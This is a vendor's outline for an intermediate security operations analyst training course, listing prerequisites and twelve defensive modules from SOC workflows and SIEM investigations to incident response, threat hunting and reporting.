info@orb-experts.com
A practical intermediate course for analysts who support monitoring, investigation, and response. Participants learn the analyst mindset, key data sources, detection and triage methods, incident workflows, and clear reporting practices across on-prem and cloud environments.
You will standardize how you collect signals, investigate alerts, and communicate findings. You will apply repeatable workflows for detection, incident response, identity and email threats, vulnerability triage, cloud telemetry, and stakeholder reporting.
After this training you will be confident in:
• Using common telemetry sources to investigate threats and reduce false positives
• Running structured triage and incident response with clear handoffs and timelines
• Applying detection engineering basics and threat hunting techniques
• Communicating findings with concise reports, metrics, and recommendations
• Comfortable with operating systems, basic networking, and command line
• Familiarity with security concepts and at least one SIEM or log platform
• Access to a non-sensitive training tenant or sample datasets is helpful
*We know each team has their own needs and specifications. That is why we can modify the training outline per need.
Module 1: Analyst mindset and SOC workflows
• Roles, queues, SLAs, and handoffs across monitoring and response
• Alert lifecycle from creation to closure with evidence tracking
• Runbooks and decision trees that balance speed and accuracy
Module 2: Threat landscape and attacker techniques
• Mapping common threats to tactics, techniques, and procedures
• Prioritizing risks for your sector and tech stack
• Translating tactics into concrete detection opportunities
Module 3: Telemetry and logging essentials
• Endpoint, network, identity, and application logs and what each reveals
• Parsing events, timestamps, users, and assets for quick context
• Building a minimal evidence checklist per alert type
Module 4: SIEM investigations and alert quality
• Query building basics and pivot patterns
• Suppression, tuning, and deduplication to cut noise
• Triage notes that support later handoff and reporting
Module 5: Detection engineering fundamentals
• Hypothesis-driven detections and baseline creation
• Rule hygiene, versioning, and change reviews
• Measuring detection quality with precision and recall signals
Module 6: Incident response lifecycle
• Preparation, identification, containment, eradication, recovery
• Case structure, timelines, and evidence integrity
• Post-incident learning and action tracking
Module 7: Identity and access investigations
• Authentication flows, MFA, tokens, and common misuse patterns
• High-value signals from directory, SSO, and privilege changes
• Quick checks to separate benign anomalies from true abuse
Module 8: Email and web threat handling
• Phishing patterns, payload types, and sandbox outcomes
• URL and attachment triage, user follow ups, and takedown requests
• Blocking, allowlisting, and awareness feedback loops
<br>Module 9: Cloud telemetry for analysts
• Core logs and findings across major providers
• Resource changes, access keys, and network paths that matter
• Practical guardrails for multi-account investigations
Module 10: Vulnerability and exposure management
• From scan results to risk-based prioritization
• CVSS with context, asset criticality, and exploit intel
• Patch windows, exceptions, and validation notes
Module 11: Threat intelligence and hunting
• Indicators vs behaviors and when to use each
• Enrichment sources, tagging, and simple scoring
• Lightweight hunts that convert into detections
Module 12: Reporting, metrics, and stakeholder communication
• Writing clear summaries, impact statements, and next actions
• Metrics that matter for leadership and operations
• Compliance-aware documentation and evidence retention basics
Hands-on learning with expert instructors at your location for organizations.
Master new skills guided by experienced instructors from anywhere.
